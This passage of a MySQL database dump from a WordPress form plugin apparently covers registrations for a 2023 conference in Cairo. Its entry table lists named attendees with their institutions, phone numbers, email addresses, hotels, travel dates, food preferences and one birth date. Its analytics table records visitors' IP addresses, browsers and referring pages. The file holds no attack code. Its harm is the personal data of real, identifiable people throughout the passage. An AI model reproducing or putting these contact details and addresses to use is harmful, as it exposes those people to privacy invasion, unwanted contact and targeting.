(964,1,90,'subject_2','','Council for Scientific and Industrial Research (CSIR)'),
(965,1,90,'input_text','','+27612667375'),
(966,1,90,'email','','lmdakane@csir.co.za'),
(967,1,90,'numeric-field','','1172'),
(968,1,90,'subject_1','','Steigenberger Hotel El Tahrir'),
(969,1,90,'Check_in_Date','','02/09/2023'),
(970,1,90,'description','','Meat'),
(971,1,91,'input_radio','','Ms.'),
(972,1,91,'names','first_name','Shelley'),
(973,1,91,'names','last_name','Haupt'),
(974,1,91,'country-list','','ZA'),
(975,1,91,'subject_2','','Council for Scientific and Industrial Research (CSIR)'),
(976,1,91,'input_text','','+27618010934'),
(977,1,91,'email','','shaupt@csir.co.za'),
(978,1,91,'numeric-field','','1571'),
(979,1,91,'subject_1','','Steingenberger Hotel El Tahrir'),
(980,1,91,'Check_in_Date','','02/09/2023'),
(981,1,91,'description','','Pasta, pizza'),
(982,1,92,'input_radio','','Dr.'),
(983,1,92,'names','first_name','Nicholas'),
(984,1,92,'names','last_name','HAMM'),
(985,1,92,'country-list','','DE'),
(986,1,92,'subject_2','','University of Nottingham'),
(987,1,92,'input_text','','+31654607838'),
(988,1,92,'email','','nicholas.hamm@nottingham.edu.cn'),
(989,1,92,'numeric-field','','1674'),
(990,1,92,'subject_1','','Ramses Hilton'),
(991,1,92,'Check_in_Date','','02/09/2023'),
(992,1,92,'description','','Nice food'),
(993,1,92,'message','','Thank you for your help.'),
(994,1,93,'input_radio','','Mr.'),
(995,1,93,'names','first_name','Bavantha'),
(996,1,93,'names','last_name','Udugama'),
(997,1,93,'country-list','','LK'),
(998,1,93,'subject_2','','University of Twente'),
(999,1,93,'input_text','','+3164748201'),
(1000,1,93,'email','','b.udugama@utwente.nl'),
(1001,1,93,'numeric-field','','1673'),
(1002,1,93,'subject_1','','Grand Nile Tower Hotel'),
(1003,1,93,'Check_in_Date','','01/09/2023'),
(1004,1,93,'description','','Meat-based food: I prefer authentic Egyptian food if possible.'),
(1005,1,94,'input_radio','','Mr.'),
(1006,1,94,'names','first_name','Kaan'),
(1007,1,94,'names','last_name','Karaman'),
(1008,1,94,'country-list','','TR'),
(1009,1,94,'subject_2','','University of Zurich'),
(1010,1,94,'input_text','','+41 76 571 1993'),
(1011,1,94,'email','','kaankaramanofficial@gmail.com'),
(1012,1,94,'numeric-field','','1320'),
(1013,1,94,'subject_1','','CAIRO RAMSES HILTON HOTEL'),
(1014,1,94,'Check_in_Date','','01/09/2023'),
(1015,1,94,'description','','I like the non-spicy foods with cooked in olive oil (any kind of meal in Mediterranean cuisine). It could also be meat (without any sauce and without the coriander/parsley).'),
(1016,1,95,'input_radio','','Mr.'),
(1017,1,95,'names','first_name','Sungjoo'),
(1018,1,95,'names','last_name','Yoon'),
(1019,1,95,'country-list','','KR'),
(1020,1,95,'subject_2','','Inha University'),
(1021,1,95,'input_text','','+82-10-5094-0609'),
(1022,1,95,'email','','22181415@inha.edu'),
(1023,1,95,'numeric-field','','727'),
(1024,1,95,'subject_1','','I don\'t know. My co-worker know that only;'),
(1025,1,95,'Check_in_Date','','02/09/2023'),
(1026,1,95,'description','','Pasta and Pizza. also korean food'),
(1027,1,95,'message','','See you soon!'),
(1028,1,96,'input_radio','','Prof.'),
(1029,1,96,'names','first_name','Dimitrios'),
(1030,1,96,'names','last_name','Skarlatos'),
(1031,1,96,'country-list','','GR'),
(1032,1,96,'subject_2','','Prof.'),
(1033,1,96,'input_text','','+35797675386'),
(1034,1,96,'email','','dimitrios.skarlatos@cut.ac.cy'),
(1035,1,96,'numeric-field','','1247'),
(1036,1,96,'subject_1','','Novotel'),
(1037,1,96,'Check_in_Date','','02/09/2023'),
(1038,1,96,'description','','all types'),
(1039,1,97,'input_radio','','Prof.'),
(1040,1,97,'names','first_name','Yiping'),
(1041,1,97,'names','last_name','Chen'),
(1042,1,97,'country-list','','CN'),
(1043,1,97,'subject_2','','Sun Yan-sen University'),
(1044,1,97,'input_text','','+8613787100178'),
(1045,1,97,'email','','chenyp79@mail.sysu.edu.cn'),
(1046,1,97,'numeric-field','','1637'),
(1047,1,97,'subject_1','','InterContinental Hotels'),
(1048,1,97,'Check_in_Date','','01/09/2023'),
(1049,1,98,'input_radio','','Mr.'),
(1050,1,98,'names','first_name','Erkki Tobias'),
(1051,1,98,'names','last_name','Bartczak'),
(1052,1,98,'country-list','','DE'),
(1053,1,98,'subject_2','','KU Leuven'),
(1054,1,98,'input_text','','+32 471 352327'),
(1055,1,98,'email','','erkkitobias.bartczak@kuleuven.be'),
(1056,1,98,'numeric-field','','1642'),
(1057,1,98,'subject_1','','Up Town Hotel'),
(1058,1,98,'Check_in_Date','','01/09/2023'),
(1059,1,98,'description','','Veggy'),
(1060,1,98,'datetime','','28/12/1992'),
(1061,1,99,'input_radio','','Ms.'),
(1062,1,99,'names','first_name','Dominique'),
(1063,1,99,'names','last_name','Courault'),
(1064,1,99,'country-list','','FR'),
(1065,1,99,'subject_2','','Inrae'),
(1066,1,99,'input_text','','33637551420'),
(1067,1,99,'email','','dominique.courault84@gmail.com'),
(1068,1,99,'numeric-field','','1888'),
(1069,1,99,'subject_1','','Hotel champollion'),
(1070,1,99,'Check_in_Date','','02/09/2023'),
(1071,1,100,'input_radio','','Ms.'),
(1072,1,100,'country-list','','DE'),
(1073,1,100,'subject_2','','German Aerospace Center (DLR)'),
(1074,1,100,'input_text','','00491749115861'),
(1075,1,100,'email','','nina.merkle@dlr.fe'),
(1076,1,100,'numeric-field','','232'),
(1077,1,100,'subject_1','','City view Hotel'),
(1078,1,100,'Check_in_Date','','02/09/2023'),
(1079,1,100,'message','','We have 10 people staying in this hotel');
/*!40000 ALTER TABLE `dnctiavkr_fluentform_entry_details` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_fluentform_form_analytics`
--

DROP TABLE IF EXISTS `dnctiavkr_fluentform_form_analytics`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_fluentform_form_analytics` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `form_id` int(10) unsigned DEFAULT NULL,
  `user_id` int(10) unsigned DEFAULT NULL,
  `source_url` varchar(255) NOT NULL,
  `platform` char(30) DEFAULT NULL,
  `browser` char(30) DEFAULT NULL,
  `city` varchar(100) DEFAULT NULL,
  `country` varchar(100) DEFAULT NULL,
  `ip` char(15) DEFAULT NULL,
  `count` int(11) DEFAULT 1,
  `created_at` timestamp NULL DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=301 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_fluentform_form_analytics`
--

LOCK TABLES `dnctiavkr_fluentform_form_analytics` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_fluentform_form_analytics` DISABLE KEYS */;
INSERT INTO `dnctiavkr_fluentform_form_analytics` VALUES
(7,1,0,'','Windows','Firefox',NULL,NULL,'47.94.108.156',17,'2023-08-25 10:32:03'),
(8,1,0,'','iPhone','iPhone',NULL,NULL,'196.155.79.105',1,'2023-08-25 17:23:21'),
(9,1,0,'','unknown','unknown',NULL,NULL,'43.239.167.154',4,'2023-08-26 09:19:39'),
(10,1,0,'','iPhone','iPhone',NULL,NULL,'196.204.9.179',1,'2023-08-28 00:22:07'),
(11,1,0,'','Apple','Safari',NULL,NULL,'105.32.101.114',2,'2023-08-28 00:22:10'),
(12,1,0,'','iPhone','iPhone',NULL,NULL,'196.129.205.227',1,'2023-08-28 00:23:35'),
(13,1,0,'','Windows','Chrome',NULL,NULL,'52.34.76.65',1,'2023-08-28 09:16:32'),
(14,1,0,'','Windows','Firefox',NULL,NULL,'35.80.96.149',1,'2023-08-28 09:17:08'),
(15,1,0,'','Windows','Internet Explorer',NULL,NULL,'35.225.82.182',1,'2023-08-28 09:17:11'),
(16,1,0,'','Windows','Chrome',NULL,NULL,'14.139.85.200',3,'2023-08-28 09:18:04'),
(17,1,0,'','Apple','Safari',NULL,NULL,'17.207.49.21',1,'2023-08-28 09:18:07'),
(18,1,0,'','Android','Chrome',NULL,NULL,'93.208.216.157',1,'2023-08-28 09:18:50'),
(19,1,0,'','Windows','Chrome',NULL,NULL,'3.126.219.214',1,'2023-08-28 09:19:30'),
(20,1,0,'','iPhone','iPhone',NULL,NULL,'41.33.120.130',1,'2023-08-28 09:20:48'),
(21,1,0,'','Windows','Chrome',NULL,NULL,'139.13.134.114',2,'2023-08-28 09:21:16'),
(22,1,0,'','Windows','Chrome',NULL,NULL,'44.212.189.149',1,'2023-08-28 09:21:16'),
(23,1,0,'','Android','Chrome',NULL,NULL,'117.136.0.225',4,'2023-08-28 09:23:55'),
(24,1,0,'','iPhone','Chrome',NULL,NULL,'126.253.234.214',1,'2023-08-28 09:25:30'),
(25,1,0,'https://ddec1-0-en-ctp.trendmicro.com/','iPhone','Chrome',NULL,NULL,'137.132.27.77',1,'2023-08-28 09:25:32'),
(26,1,0,'','Windows','Firefox',NULL,NULL,'133.3.201.98',1,'2023-08-28 09:27:12'),
(27,1,0,'','Windows','Chrome',NULL,NULL,'212.25.19.61',1,'2023-08-28 09:28:22'),
(28,1,0,'https://mail.qq.com/','Windows','Chrome',NULL,NULL,'202.114.114.52',1,'2023-08-28 09:28:28'),
(29,1,0,'','Windows','Chrome',NULL,NULL,'155.230.14.194',1,'2023-08-28 09:29:21'),
(30,1,0,'','Linux','Chrome',NULL,NULL,'157.119.232.164',1,'2023-08-28 09:29:36'),
(31,1,0,'','Windows','Firefox',NULL,NULL,'158.132.186.200',1,'2023-08-28 09:33:10'),
(32,1,0,'','Windows','Chrome',NULL,NULL,'138.246.3.59',1,'2023-08-28 09:33:39'),
(33,1,0,'https://ddec1-0-en-ctp.trendmicro.com/','Windows','Chrome',NULL,NULL,'137.132.27.136',1,'2023-08-28 09:35:17'),
(34,1,0,'','Windows','Chrome',NULL,NULL,'45.143.232.20',1,'2023-08-28 09:36:17'),
(35,1,0,'','Android','Chrome',NULL,NULL,'85.118.80.89',2,'2023-08-28 09:42:39'),
(36,1,0,'','Windows','Chrome',NULL,NULL,'182.48.101.188',1,'2023-08-28 09:44:28'),
(37,1,0,'','Windows','Firefox',NULL,NULL,'123.127.227.1',4,'2023-08-28 09:52:40'),
(38,1,0,'','iPhone','iPhone',NULL,NULL,'95.88.194.147',1,'2023-08-28 10:03:16'),
(39,1,0,'','Windows','Firefox',NULL,NULL,'130.75.85.200',2,'2023-08-28 10:17:59'),
(40,1,0,'','iPhone','iPhone',NULL,NULL,'194.96.122.201',1,'2023-08-28 10:18:18'),
(41,1,0,'','Windows','Chrome',NULL,NULL,'136.158.0.72',2,'2023-08-28 10:18:46'),
(42,1,0,'','Windows','Firefox',NULL,NULL,'195.176.96.33',1,'2023-08-28 10:23:52'),
(43,1,0,'','Linux','Firefox',NULL,NULL,'196.219.62.4',1,'2023-08-28 10:26:30'),
(44,1,0,'','iPhone','iPhone',NULL,NULL,'5.61.127.65',2,'2023-08-28 10:29:42'),
(45,1,0,'','Windows','Chrome',NULL,NULL,'58.240.81.84',1,'2023-08-28 10:34:23'),
(46,1,0,'','Windows','Chrome',NULL,NULL,'183.6.9.80',1,'2023-08-28 10:35:44'),
(47,1,0,'','Windows','Chrome',NULL,NULL,'124.16.186.11',1,'2023-08-28 10:35:49'),
(48,1,0,'','Windows','Chrome',NULL,NULL,'31.21.210.184',1,'2023-08-28 10:37:32'),
(49,1,0,'','Windows','Chrome',NULL,NULL,'193.190.225.246',1,'2023-08-28 10:39:05'),
(50,1,0,'','iPhone','iPhone',NULL,NULL,'223.104.41.223',1,'2023-08-28 10:40:38'),
(51,1,0,'https://mail.qq.com/cgi-bin/readtemplate?t=safety&check=false&gourl=https%3A%2F%2Fgsw2023.com%2Findex.php%2F2023%2F08%2F20%2F5364%2F&subtemplate=gray&evil=0','Windows','Internet Explorer',NULL,NULL,'219.238.166.198',1,'2023-08-28 10:43:14'),
(52,1,0,'https://gsw2023.com/','Windows','Chrome',NULL,NULL,'118.167.13.197',1,'2023-08-28 10:46:01'),
(53,1,0,'https://exmail.qq.com/','Windows','Chrome',NULL,NULL,'103.82.4.213',2,'2023-08-28 10:52:37'),
(54,1,0,'','Apple','Chrome',NULL,NULL,'85.233.56.163',2,'2023-08-28 10:59:40'),
(55,1,0,'','Android','Chrome',NULL,NULL,'141.113.65.8',1,'2023-08-28 11:00:25'),
(56,1,0,'','Windows','Chrome',NULL,NULL,'185.229.159.92',1,'2023-08-28 11:04:00'),
(57,1,0,'android-app://com.google.android.gm/','Linux','Chrome',NULL,NULL,'151.47.108.175',1,'2023-08-28 11:04:13'),
(58,1,0,'','Windows','Chrome',NULL,NULL,'111.187.32.57',1,'2023-08-28 11:06:04'),
(59,1,0,'android-app://com.google.android.gm/','Android','Chrome',NULL,NULL,'91.180.19.244',1,'2023-08-28 11:06:28'),
(60,1,0,'https://exmail.qq.com/','Windows','Chrome',NULL,NULL,'223.82.100.162',1,'2023-08-28 11:10:17'),
(61,1,0,'','Android','Chrome',NULL,NULL,'218.225.238.81',2,'2023-08-28 11:13:15'),
(62,1,0,'','Windows','Chrome',NULL,NULL,'151.49.78.196',1,'2023-08-28 11:15:37'),
(63,1,0,'','Windows','Firefox',NULL,NULL,'129.247.247.239',2,'2023-08-28 11:18:32'),
(64,1,0,'','Windows','Firefox',NULL,NULL,'109.97.214.27',1,'2023-08-28 11:22:59'),
(65,1,0,'','Windows','Chrome',NULL,NULL,'130.75.85.104',1,'2023-08-28 11:31:18'),
(66,1,0,'','Windows','Chrome',NULL,NULL,'131.246.194.42',1,'2023-08-28 11:36:17'),
(67,1,0,'','Windows','Chrome',NULL,NULL,'105.199.240.5',1,'2023-08-28 11:38:02'),
(68,1,0,'','Windows','Chrome',NULL,NULL,'130.75.85.99',1,'2023-08-28 11:40:29'),
(69,1,0,'https://e.mail.ru/','Windows','Chrome',NULL,NULL,'84.42.98.122',2,'2023-08-28 11:48:15'),
(70,1,0,'','Windows','Chrome',NULL,NULL,'130.192.232.229',1,'2023-08-28 11:50:13'),
(71,1,0,'','Windows','Firefox',NULL,NULL,'130.83.106.108',1,'2023-08-28 12:07:27'),
(72,1,0,'','Windows','Firefox',NULL,NULL,'91.116.252.10',1,'2023-08-28 12:11:10'),
(73,1,0,'','Windows','Firefox',NULL,NULL,'34.206.158.63',1,'2023-08-28 12:11:13'),
(74,1,0,'','Windows','Chrome',NULL,NULL,'194.36.111.91',1,'2023-08-28 12:11:49'),
(75,1,0,'','Windows','Chrome',NULL,NULL,'218.185.248.66',2,'2023-08-28 12:14:32'),
(76,1,0,'','Android','Chrome',NULL,NULL,'196.119.170.65',3,'2023-08-28 12:15:57'),
(77,1,0,'','Windows','Chrome',NULL,NULL,'88.212.174.232',1,'2023-08-28 12:21:53'),
(78,1,0,'','Windows','Chrome',NULL,NULL,'133.201.6.64',1,'2023-08-28 12:27:33'),
(79,1,0,'','Android','Chrome',NULL,NULL,'106.196.74.181',1,'2023-08-28 12:30:04'),
(80,1,0,'','Windows','Chrome',NULL,NULL,'131.112.114.9',1,'2023-08-28 12:32:06'),
(81,1,0,'','Windows','Chrome',NULL,NULL,'31.189.36.235',1,'2023-08-28 12:35:58'),
(82,1,0,'','Windows','Chrome',NULL,NULL,'161.53.248.100',1,'2023-08-28 12:45:04'),
(83,1,0,'','Windows','Chrome',NULL,NULL,'85.122.24.231',1,'2023-08-28 12:45:49'),
(84,1,0,'','Windows','Firefox',NULL,NULL,'31.14.219.156',1,'2023-08-28 12:58:26'),
(85,1,0,'','Windows','Firefox',NULL,NULL,'150.107.72.254',1,'2023-08-28 12:58:33'),
(86,1,0,'','Windows','Firefox',NULL,NULL,'111.220.180.228',1,'2023-08-28 12:58:40'),
(87,1,0,'','iPhone','iPhone',NULL,NULL,'95.127.230.247',1,'2023-08-28 13:16:18'),
(88,1,0,'','iPhone','iPhone',NULL,NULL,'44.206.146.163',1,'2023-08-28 13:16:24'),
(89,1,0,'','Windows','Chrome',NULL,NULL,'93.177.72.248',1,'2023-08-28 13:16:52'),
(90,1,0,'','Windows','Chrome',NULL,NULL,'62.2.164.236',1,'2023-08-28 13:20:26'),
(91,1,0,'','Linux','Chrome',NULL,NULL,'66.102.9.98',2,'2023-08-28 13:21:45'),
(92,1,0,'https://www.google.com/','Windows','Chrome',NULL,NULL,'62.2.164.236',2,'2023-08-28 13:22:44'),
(93,1,0,'','Windows','Chrome',NULL,NULL,'93.34.232.220',1,'2023-08-28 13:42:27'),
(94,1,0,'','Windows','Firefox',NULL,NULL,'95.90.186.14',1,'2023-08-28 13:43:14'),
(95,1,0,'','Android','Chrome',NULL,NULL,'45.97.247.227',1,'2023-08-28 13:57:24'),
(96,1,0,'','iPad','Chrome',NULL,NULL,'37.48.57.129',1,'2023-08-28 14:02:44'),
(97,1,0,'','iPhone','iPhone',NULL,NULL,'185.224.57.167',1,'2023-08-28 14:03:29'),
(98,1,0,'','Android','Chrome',NULL,NULL,'156.163.41.43',1,'2023-08-28 14:09:36'),
(99,1,0,'','Windows','Firefox',NULL,NULL,'131.175.56.104',1,'2023-08-28 14:33:56'),
(100,1,0,'https://mail.google.com/','Windows','Chrome',NULL,NULL,'119.2.52.145',1,'2023-08-28 14:50:49'),
(101,1,0,'','Windows','Firefox',NULL,NULL,'131.220.147.65',1,'2023-08-28 14:54:36'),
(102,1,0,'','iPhone','iPhone',NULL,NULL,'31.205.214.132',1,'2023-08-28 15:00:36'),
(103,1,0,'','Windows','Firefox',NULL,NULL,'46.5.136.124',1,'2023-08-28 15:17:41'),
(104,1,0,'','Android','Firefox',NULL,NULL,'201.69.225.26',1,'2023-08-28 15:46:08'),
(105,1,0,'https://ddec1-0-en-ctp.trendmicro.com/','iPhone','Chrome',NULL,NULL,'202.51.247.26',1,'2023-08-28 15:50:13'),
(106,1,0,'','Windows','Internet Explorer',NULL,NULL,'34.105.37.64',1,'2023-08-28 16:08:24'),
(107,1,0,'','Windows','Chrome',NULL,NULL,'41.140.203.186',2,'2023-08-28 16:09:08'),
(108,1,0,'','Windows','Chrome',NULL,NULL,'138.199.22.146',1,'2023-08-28 16:33:10'),
(109,1,0,'','Windows','Chrome',NULL,NULL,'200.145.183.183',5,'2023-08-28 16:48:49'),
(110,1,0,'https://mail.google.com/','Windows','Chrome',NULL,NULL,'186.217.13.165',1,'2023-08-28 17:01:51'),
(111,1,0,'android-app://com.google.android.gm/','Android','Chrome',NULL,NULL,'75.71.94.37',2,'2023-08-28 17:07:42'),
(112,1,0,'','Android','Chrome',NULL,NULL,'222.20.193.17',1,'2023-08-28 17:47:34'),
(113,1,0,'','Windows','Chrome',NULL,NULL,'146.169.239.216',2,'2023-08-28 18:14:18'),
(114,1,0,'','Windows','Chrome',NULL,NULL,'74.133.13.247',1,'2023-08-28 18:18:29'),
(115,1,0,'','Windows','Chrome',NULL,NULL,'174.129.30.72',1,'2023-08-28 18:19:05'),
(116,1,0,'','Windows','Chrome',NULL,NULL,'23.82.17.100',1,'2023-08-28 18:19:46'),
(117,1,0,'','Windows','Chrome',NULL,NULL,'130.92.118.193',2,'2023-08-28 18:26:13'),
(118,1,0,'https://mail.cau.edu.cn/','Windows','Chrome',NULL,NULL,'205.198.122.92',1,'2023-08-28 18:29:36'),
(119,1,0,'https://mail.qq.com/','Windows','Chrome',NULL,NULL,'183.252.16.115',1,'2023-08-28 18:35:41'),
(120,1,0,'','Apple','Safari',NULL,NULL,'131.175.147.1',1,'2023-08-28 18:38:13'),
(121,1,0,'','Windows','Chrome',NULL,NULL,'201.144.54.253',1,'2023-08-28 18:54:57'),
(122,1,0,'','Android','Chrome',NULL,NULL,'222.129.52.187',3,'2023-08-28 19:03:37'),
(123,1,0,'','iPhone','Chrome',NULL,NULL,'172.58.123.45',2,'2023-08-28 19:04:29'),
(124,1,0,'','Windows','Chrome',NULL,NULL,'103.113.156.95',1,'2023-08-28 19:36:15'),
(125,1,0,'','Windows','Chrome',NULL,NULL,'79.9.128.230',2,'2023-08-28 19:38:41'),
(126,1,0,'','Windows','Firefox',NULL,NULL,'45.139.213.93',1,'2023-08-28 19:41:11'),
(127,1,0,'','Windows','Firefox',NULL,NULL,'157.193.240.191',1,'2023-08-28 19:58:23'),
(128,1,0,'','Android','Chrome',NULL,NULL,'223.104.41.213',1,'2023-08-28 20:04:53'),
(129,1,0,'','iPhone','iPhone',NULL,NULL,'72.136.110.157',1,'2023-08-28 20:05:57'),
(130,1,0,'','Android','Chrome',NULL,NULL,'2.85.115.167',1,'2023-08-28 20:10:47'),
(131,1,0,'','Android','Chrome',NULL,NULL,'188.188.228.76',1,'2023-08-28 20:23:35'),
(132,1,0,'','iPhone','iPhone',NULL,NULL,'5.90.200.217',1,'2023-08-28 20:26:56'),
(133,1,0,'','Windows','Chrome',NULL,NULL,'213.91.236.246',1,'2023-08-28 20:30:01'),
(134,1,0,'','Windows','Chrome',NULL,NULL,'103.37.200.52',1,'2023-08-28 21:16:53'),
(135,1,0,'','Windows','Firefox',NULL,NULL,'185.218.126.248',1,'2023-08-28 21:20:22'),
(136,1,0,'','Windows','Chrome',NULL,NULL,'137.205.151.150',1,'2023-08-28 21:58:27'),
(137,1,0,'','Windows','Chrome',NULL,NULL,'51.191.39.247',1,'2023-08-28 21:59:10'),
(138,1,0,'','Windows','Chrome',NULL,NULL,'3.211.217.65',1,'2023-08-28 21:59:16'),
(139,1,0,'','Windows','Chrome',NULL,NULL,'38.206.130.210',1,'2023-08-28 22:00:24'),
(140,1,0,'','Windows','Chrome',NULL,NULL,'78.94.111.209',1,'2023-08-28 23:08:07'),
(141,1,0,'','Windows','Chrome',NULL,NULL,'118.20.187.50',1,'2023-08-28 23:51:10'),
(142,1,0,'https://mail.cstnet.cn/','Windows','Chrome',NULL,NULL,'59.66.127.124',1,'2023-08-29 00:52:39'),
(143,1,0,'','Windows','Chrome',NULL,NULL,'129.247.247.240',2,'2023-08-29 03:06:53'),
(144,1,0,'','Android','Chrome',NULL,NULL,'126.120.232.141',1,'2023-08-29 03:40:10'),
(145,1,0,'','Windows','Chrome',NULL,NULL,'117.136.0.110',2,'2023-08-29 04:45:39'),
(146,1,0,'http://mail.nuaa.edu.cn/','Windows','Chrome',NULL,NULL,'46.232.122.39',2,'2023-08-29 05:41:25'),
(147,1,0,'','Apple','Chrome',NULL,NULL,'35.209.116.62',1,'2023-08-29 07:58:13'),
(148,1,0,'https://mail.tongji.edu.cn/','Windows','Firefox',NULL,NULL,'111.187.104.211',1,'2023-08-29 07:58:41'),
(149,1,0,'','Apple','Chrome',NULL,NULL,'35.212.189.98',1,'2023-08-29 09:22:20'),
(150,1,0,'','Windows','Chrome',NULL,NULL,'218.244.250.66',1,'2023-08-29 09:52:32'),
(151,1,0,'','Windows','Chrome',NULL,NULL,'39.155.198.212',2,'2023-08-29 09:56:49'),
(152,1,0,'','Windows','Chrome',NULL,NULL,'151.251.227.84',2,'2023-08-29 10:01:08'),
(153,1,0,'','iPhone','iPhone',NULL,NULL,'140.116.80.14',1,'2023-08-29 10:30:52'),
(154,1,0,'','Windows','Chrome',NULL,NULL,'103.37.201.178',2,'2023-08-29 10:51:44'),
(155,1,0,'','Windows','Chrome',NULL,NULL,'103.37.201.179',2,'2023-08-29 11:14:10'),
(156,1,0,'','Windows','Chrome',NULL,NULL,'212.252.116.58',1,'2023-08-29 11:49:36'),
(157,1,0,'','Android','Chrome',NULL,NULL,'111.187.12.80',1,'2023-08-29 11:49:37'),
(158,1,0,'','Windows','Chrome',NULL,NULL,'130.92.210.162',1,'2023-08-29 12:16:13'),
(159,1,0,'','Windows','Firefox',NULL,NULL,'178.223.49.127',1,'2023-08-29 12:26:38'),
(160,1,0,'https://www.gsw2023.com/index.php?g=admin&m=public&a=login','Apple','Chrome',NULL,NULL,'198.204.245.218',5,'2023-08-29 12:29:56'),
(161,1,0,'https://mail.google.com/','Windows','Chrome',NULL,NULL,'203.17.23.87',1,'2023-08-29 13:10:14'),
(162,1,0,'','Windows','Chrome',NULL,NULL,'69.176.1.4',1,'2023-08-29 14:38:52'),
(163,1,0,'','Windows','Chrome',NULL,NULL,'111.187.56.234',1,'2023-08-29 14:58:56'),
(164,1,0,'','Windows','Chrome',NULL,NULL,'130.75.85.185',1,'2023-08-29 16:10:57'),
(165,1,0,'','Windows','Chrome',NULL,NULL,'78.80.80.210',1,'2023-08-29 16:17:18'),
(166,1,0,'','Apple','Chrome',NULL,NULL,'106.154.148.184',1,'2023-08-29 16:45:03'),
(167,1,0,'','Windows','Chrome',NULL,NULL,'196.132.51.147',1,'2023-08-29 18:37:45'),
(168,1,0,'','Windows','Firefox',NULL,NULL,'95.90.190.137',1,'2023-08-29 18:44:28'),
(169,1,0,'','Windows','Firefox',NULL,NULL,'188.37.228.92',1,'2023-08-29 19:20:23'),
(170,1,0,'','Windows','Chrome',NULL,NULL,'31.31.48.132',1,'2023-08-29 19:20:26'),
(171,1,0,'https://exmail.qq.com/','Windows','Chrome',NULL,NULL,'61.185.187.230',1,'2023-08-29 20:13:15'),
(172,1,0,'','Windows','Chrome',NULL,NULL,'46.253.190.154',1,'2023-08-29 20:54:10'),
(173,1,0,'','Windows','Chrome',NULL,NULL,'208.85.80.215',1,'2023-08-29 21:45:28'),
(174,1,0,'https://mail.google.com/','Windows','Chrome',NULL,NULL,'93.40.77.201',1,'2023-08-29 22:08:53'),
(175,1,0,'','Windows','Chrome',NULL,NULL,'97.75.155.134',1,'2023-08-29 23:11:12'),
(176,1,0,'','unknown','YandexBot',NULL,NULL,'5.255.231.68',1,'2023-08-29 23:23:59'),
(177,1,0,'','Windows','Firefox',NULL,NULL,'140.116.80.17',1,'2023-08-30 07:41:54'),
(178,1,0,'android-app://com.google.android.gm/','Android','Chrome',NULL,NULL,'118.100.50.158',1,'2023-08-30 10:06:47'),
(179,1,0,'https://mail.qq.com/','Windows','Chrome',NULL,NULL,'192.74.229.114',2,'2023-08-30 10:35:21'),
(180,1,0,'','Android','Chrome',NULL,NULL,'222.20.193.233',1,'2023-08-30 10:45:14'),
(181,1,0,'','Windows','Chrome',NULL,NULL,'114.47.46.8',2,'2023-08-30 10:57:40'),
(182,1,0,'','Windows','Chrome',NULL,NULL,'114.37.227.106',1,'2023-08-30 11:07:46'),
(183,1,0,'','Windows','Chrome',NULL,NULL,'37.160.155.156',2,'2023-08-30 12:13:15'),
(184,1,0,'','Apple','Chrome',NULL,NULL,'37.43.193.221',1,'2023-08-30 12:31:10'),
(185,1,0,'','Android','Chrome',NULL,NULL,'118.163.68.162',1,'2023-08-30 13:04:06'),
(186,1,0,'https://mailh.qiye.163.com/','Windows','Chrome',NULL,NULL,'118.163.68.162',1,'2023-08-30 13:05:21'),
(187,1,0,'','iPhone','iPhone',NULL,NULL,'37.19.205.185',1,'2023-08-30 13:15:02'),
(188,1,0,'','Apple','Chrome',NULL,NULL,'37.42.56.18',1,'2023-08-30 13:35:51'),
(189,1,0,'','Windows','Firefox',NULL,NULL,'84.88.62.131',1,'2023-08-30 13:47:11'),
(190,1,0,'','Windows','Chrome',NULL,NULL,'158.64.49.118',1,'2023-08-30 14:32:31'),
(191,1,0,'','Windows','Firefox',NULL,NULL,'83.171.91.97',4,'2023-08-30 15:08:37'),
(192,1,0,'','Android','Chrome',NULL,NULL,'80.187.75.63',1,'2023-08-30 15:31:15'),
(193,1,0,'','Apple','Safari',NULL,NULL,'178.38.93.192',1,'2023-08-30 16:16:04'),
(194,1,0,'http://pta-smg2.csir.co.za:32224/','Windows','Chrome',NULL,NULL,'146.64.25.180',1,'2023-08-30 16:30:08'),
(195,1,0,'','Windows','Chrome',NULL,NULL,'134.169.73.191',1,'2023-08-30 16:58:15'),
(196,1,0,'','Android','Chrome',NULL,NULL,'46.251.212.190',2,'2023-08-30 18:49:03'),
(197,1,0,'','Windows','Chrome',NULL,NULL,'144.82.114.244',1,'2023-08-30 21:00:23'),
(198,1,0,'','iPhone','iPhone',NULL,NULL,'31.51.72.83',1,'2023-08-30 22:38:23'),
(199,1,0,'','Windows','Chrome',NULL,NULL,'151.19.15.148',1,'2023-08-30 23:40:34'),
(200,1,0,'','Windows','Firefox',NULL,NULL,'47.105.110.50',1,'2023-08-31 02:21:28'),
(201,1,0,'','Windows','Chrome',NULL,NULL,'122.179.116.125',5,'2023-08-31 05:04:04'),
(202,1,0,'','Windows','Chrome',NULL,NULL,'111.166.28.167',2,'2023-08-31 09:13:06'),
(203,1,0,'','Windows','Chrome',NULL,NULL,'114.70.12.217',1,'2023-08-31 10:19:40'),
(204,1,0,'','Windows','Chrome',NULL,NULL,'155.230.14.222',1,'2023-08-31 10:20:39'),
(205,1,0,'','Windows','Firefox',NULL,NULL,'45.139.213.237',1,'2023-08-31 11:23:51'),
(206,1,0,'http://pta-smg2.csir.co.za:32224/','Windows','Chrome',NULL,NULL,'105.245.233.236',1,'2023-08-31 12:18:39'),
(207,1,0,'http://pta-smg2.csir.co.za:32224/','Linux','Chrome',NULL,NULL,'146.64.217.26',1,'2023-08-31 12:20:04'),
(208,1,0,'http://pta-smg2.csir.co.za:32224/','Windows','Chrome',NULL,NULL,'146.64.19.99',1,'2023-08-31 12:22:28'),
(209,1,0,'','unknown','Chrome',NULL,NULL,'40.77.167.238',1,'2023-08-31 13:07:03'),
(210,1,0,'','unknown','Chrome',NULL,NULL,'52.167.144.183',1,'2023-08-31 13:10:46'),
(211,1,0,'','unknown','Chrome',NULL,NULL,'52.167.144.239',2,'2023-08-31 14:22:14'),
(212,1,0,'','Windows','Chrome',NULL,NULL,'188.6.117.3',1,'2023-08-31 16:48:39'),
